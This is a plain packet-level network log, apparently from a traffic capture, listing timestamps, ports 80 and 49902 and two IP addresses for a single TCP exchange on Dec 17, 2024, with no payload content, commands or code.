Dec 17, 2024 06:03:40.055809975 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.055850029 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.056739092 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.056776047 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.056794882 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.056818962 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.057801008 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.057857037 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.057949066 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.057991982 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.058605909 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.058645010 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.058657885 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.058682919 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.059887886 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.059948921 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.060040951 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.060086012 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.060858965 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.060909033 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.061012983 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.061057091 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.061975002 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.062028885 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.062153101 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.062199116 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.062963009 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.063005924 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.063118935 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.063158035 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.064011097 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.064055920 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.198066950 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.198141098 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.198190928 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.198235989 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.198540926 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.198585033 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.198615074 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.198662043 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.199392080 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.199455023 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.199491978 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.199532986 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.200429916 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.200491905 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.200529099 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.200572014 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.201539040 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.201587915 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.201616049 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.201656103 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.202670097 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.202685118 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.202712059 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.202738047 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.203650951 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.203689098 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.203727007 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.203763008 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.204668045 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.204706907 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.204788923 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.204838991 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.205763102 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.205809116 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.205851078 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.205899954 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.206816912 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.206864119 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.206912041 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.206955910 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.207901955 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.207950115 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.207993984 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.208034039 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.208967924 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.208981991 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.209021091 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.209043980 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.209995031 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.210040092 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.210140944 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.210184097 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.211039066 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.211086988 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.211191893 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.211237907 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.212147951 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.212197065 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.212271929 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.212311983 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.213219881 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.213247061 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.213269949 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.213280916 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.214286089 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.214344978 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.214345932 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.214452028 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.215375900 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.215389013 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.215421915 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.215445995 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.216444969 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.216460943 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.216495991 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.216504097 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.217495918 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.217510939 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.217546940 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.218532085 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.218578100 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.218703985 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.218770027 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.219660997 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.219676971 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.219706059 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.219717979 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.220700026 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.220715046 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.220746040 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.220776081 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.221755981 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.221771002 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.221805096 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.221826077 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.222865105 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.222882032 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.222912073 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.222932100 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.223783970 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.223834038 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.223910093 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.223957062 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.224888086 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.224935055 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.224960089 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.225003004 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.225918055 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.225965977 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.225997925 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.226033926 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.226973057 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.227025032 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.227111101 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.227159977 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.228210926 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.228262901 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.228290081 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.228338003 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.229078054 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.229126930 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.229218006 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.229268074 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.230118990 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.230170012 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.230235100 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.230281115 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.231271029 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.231323004 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.231403112 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.231446981 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.232281923 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.232337952 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.232367992 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.232419014 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.233359098 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.233406067 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.233432055 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.233474970 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.234428883 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.234472036 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.234502077 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.234553099 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.235438108 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.235497952 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.235563040 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.235608101 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.236540079 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.236597061 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.236692905 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.236745119 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.237560987 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.237611055 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.237673044 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.237718105 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.238658905 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.238706112 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.238756895 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.238801956 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.239717960 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.239767075 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.239829063 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.239873886 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.240778923 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.240835905 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.240860939 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.240906954 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.241820097 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.241869926 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.241902113 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.241950035 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.242925882 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.242985964 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.243089914 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.243134975 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.244008064 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.244050980 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.244116068 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.244162083 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.245026112 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.245078087 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.245203018 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.245250940 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.246103048 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.246150970 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.246201992 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.246244907 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.247190952 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.247204065 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.247234106 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.247252941 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.248157024 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.248203993 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.248261929 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.248313904 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.249339104 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.249353886 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.249386072 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.249406099 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.250305891 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.250360012 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.250396013 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.250437021 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.251374960 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.251430035 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.251447916 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.251493931 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.252425909 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.252473116 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.252505064 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.252549887 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.253463030 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.253514051 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.390647888 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.390685081 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.390713930 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.390753031 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.390974045 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.391015053 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.391091108 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.391129971 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.392087936 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.392128944 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.392162085 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.392201900 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.393053055 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.393099070 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.393162966 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.393203974 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.394141912 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.394193888 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.394311905 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.394350052 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.395220041 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.395267010 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.395353079 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.395397902 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.396260977 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.396347046 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.396425962 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.396466017 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.397304058 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.397350073 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.397416115 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.397465944 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.398463964 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.398500919 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.398514032 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.398541927 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.399420023 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.399470091 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.399609089 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.399652004 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.400491953 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.400537014 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.400639057 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.400681019 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.401570082 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.401618958 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.401695967 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.401741982 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.402642965 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.402688026 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.402749062 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.402862072 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.403707981 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.403758049 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.403841972 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.403894901 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.404763937 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.404820919 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.404850960 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.404897928 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.405949116 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.405986071 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.406053066 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.406100035 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.406910896 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.406958103 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.406965017 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.407008886 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.407952070 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.408001900 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.408018112 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.408062935 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.408974886 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.409020901 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.409099102 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.409146070 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.410161018 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.410197020 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.410218954 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.410228014 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.411166906 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.411211014 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.411345005 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.411387920 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.412261963 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.412298918 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.412372112 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.413315058 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.413350105 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.413360119 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.413392067 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.414297104 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.414343119 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.414468050 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.414509058 CET	49902	80	192.168.2.5	31.41.244.11
